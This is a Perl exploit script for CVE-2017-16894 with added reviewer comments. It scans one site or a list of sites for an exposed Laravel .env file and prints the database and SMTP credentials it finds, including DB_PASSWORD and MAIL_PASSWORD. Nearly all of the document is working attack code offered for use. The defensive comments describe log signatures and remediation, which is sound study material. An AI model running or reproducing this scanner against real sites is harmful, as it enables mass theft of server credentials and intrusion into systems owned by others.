- #!/usr/bin/perl
- # [CVE-2017-16894] - Laravel Environment Variables - Read passwords and login credentials
- # CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16894
- # POC: http://whiteboyz.xyz/laravel-env-file-vuln.html
- # Coder by v4p0r 20 NOV 2017
- use strict;
- use warnings;
- use Getopt::Long;
- use WWW::Mechanize;
# Command-line driver for the script.
# Parses --list-site/-l, --site/-s and --help/-h, then fetches either the
# single URL from --site or each line of the --list-site file through
# request(). A response is reported as exposed when its body contains the
# string APP_ENV; get_config() then prints the DB_* and MAIL_* values in it.
# The test is a plain substring match on the body, so any page that merely
# contains "APP_ENV" is reported the same way.
# For defenders: per the file header this is CVE-2017-16894, a Laravel .env
# file reachable over HTTP. The usage text shows the operator passing the
# full URL of the .env file, so in access logs this is a GET for the .env
# path. Remediation is on the hosting side: serve only the application's
# public/ directory, deny requests for dotfiles, and rotate every credential
# the file held if it was ever served.
- my ($helpzinho);
# Array in scalar context: the number of command-line arguments, captured
# before GetOptions() processes @ARGV.
- my $banner = @ARGV;
# Option values land in the package globals $main::list and $main::site.
- GetOptions( 'list-site|l=s' => \$main::list,
- 'site|s=s' => \$main::site,
- 'help|h' => \$helpzinho,
- );
# --help: banner() prints the usage text and exits, so nothing below runs.
- if ($helpzinho) {
- &banner;
- }
# Title block, printed on every run that gets past --help.
- print "================================\n" .
- " # Exploit: EAV EXPLOIT \n" .
- " # Coder: v4p0r \n" .
- " # Date: 21 NOV 2017 \n" .
- "================================\n";
# Single-target mode (--site). On a match the values are printed and the
# script exits; on a miss it prints [NOT VULN] and execution continues with
# the checks below rather than stopping here.
- if ($main::site) {
- my $url = $main::site;
- print $url;
- my $env = request($url);
- if ($env =~ /APP_ENV/){
- get_config($env);
- exit;
- } else {
- print "[NOT VULN]";
- }
- }
# Fewer than two command-line arguments: print the credits and a usage hint,
# then exit.
- if($banner <= 1){
- print "\nCoder: v4p0r\n" .
- "Team: Yunkers Crew\n" .
- "Twitter: 0x777null\n".
- "Skype: drx.priv\n\n" .
- "Usage: perl $0 --help\n";
- exit;
- }
# List mode (--list-site): read the whole target file into memory.
# The parentheses around open's arguments make `||` apply to open's result.
# NOTE(review): when --list-site was not given, $main::list is undef here;
# confirm whether this open actually fails and reaches the die.
- open (my $web,'<',$main::list) || die "\n [Lista nao selecionada]";
- my @sites = <$web>;
# Each line is passed on as read; no chomp is applied before request().
- foreach my $url(@sites) {
- print "\n[SITE]: ".$url."";
- my $env = request($url);
- if ($env =~ /APP_ENV/){
- get_config($env);
- } else {
- print "[NOT VULN]";
- }
- }
# Fetch a URL and return the response body as a string.
#
# Argument: the target, with or without a scheme. Anything that does not
# start with http:// or https:// gets http:// prepended.
# Returns: whatever WWW::Mechanize reports as the content of the response.
#
# For defenders, the client settings below are what the request looks like
# from the server side: User-Agent "Mozilla 5.0", a 3-second timeout, a
# response cap of 1024000 bytes, and only the http and https schemes.
sub request {
    my ($target) = @_;

    # Default to plain HTTP when the caller supplied no scheme.
    unless ( $target =~ m{^https?://} ) {
        $target = 'http://' . $target;
    }

    my $client = WWW::Mechanize->new( agent => 'Mozilla 5.0' );
    $client->timeout(3);
    $client->max_size(1024000);
    $client->protocols_allowed( [ 'http', 'https' ] );

    $client->get($target);

    my $body = $client->content;
    return $body;
}
# Print the database and mail settings found in the text of a .env file.
#
# Argument: the file content as one string.
# Output: a "[DATABASE CONFIG]" section with the six DB_* keys, then an
# "[SMTP CONFIG]" section with the eight MAIL_* keys, one "[KEY]: value"
# line each. A key that does not occur is printed as "Nothing".
#
# Each key is searched with an unanchored KEY=(.*) pattern, so the first
# occurrence anywhere in the text wins and the value runs to the end of
# that line.
#
# For defenders: the keys listed here are the secrets to treat as disclosed
# and rotate whenever a .env file has been served to an unauthenticated
# client.
sub get_config {
    my ($dotenv) = @_;

    my @sections = (
        [
            "\n[DATABASE CONFIG]\n\n",
            [
                qw(
                    DB_CONNECTION DB_HOST DB_PORT
                    DB_DATABASE DB_USERNAME DB_PASSWORD
                )
            ],
        ],
        [
            "\n[SMTP CONFIG]\n\n",
            [
                qw(
                    MAIL_DRIVER MAIL_HOST MAIL_PORT
                    MAIL_FROM_NAME MAIL_FROM_EMAIL
                    MAIL_USERNAME MAIL_PASSWORD MAIL_ENCRYPTION
                )
            ],
        ],
    );

    my @report;
    for my $section (@sections) {
        my ( $heading, $keys ) = @{$section};
        push @report, $heading;

        for my $key ( @{$keys} ) {
            # List-context match: $value stays undef when the key is absent.
            my ($value) = $dotenv =~ /${key}=(.*)/;
            push @report, "[$key]: " . ( $value // 'Nothing' ) . "\n";
        }
    }

    print join( '', @report );
}
# Print the usage text and terminate the process.
#
# The text (in Portuguese) lists the three options, --help, --list-site|l
# and --site|s, followed by two example invocations built from $0.
# This sub never returns: it ends with exit.
sub banner {
    my $script = $0;

    # A leading empty element gives the blank line before "Usage:".
    my @usage_lines = (
        '',
        "Usage: $script <comando>",
        '[+] Comandos:',
        '--help [Ajuda com os comandos]',
        '--list-site|l [Seleciona sua lista de sites]',
        '--site|s [Unico alvo]',
        '[!] Exemplos:',
        "perl $script -l sites.txt",
        "perl $script -s http://localhost/.env",
    );

    print join( "\n", @usage_lines ), "\n";
    exit;
}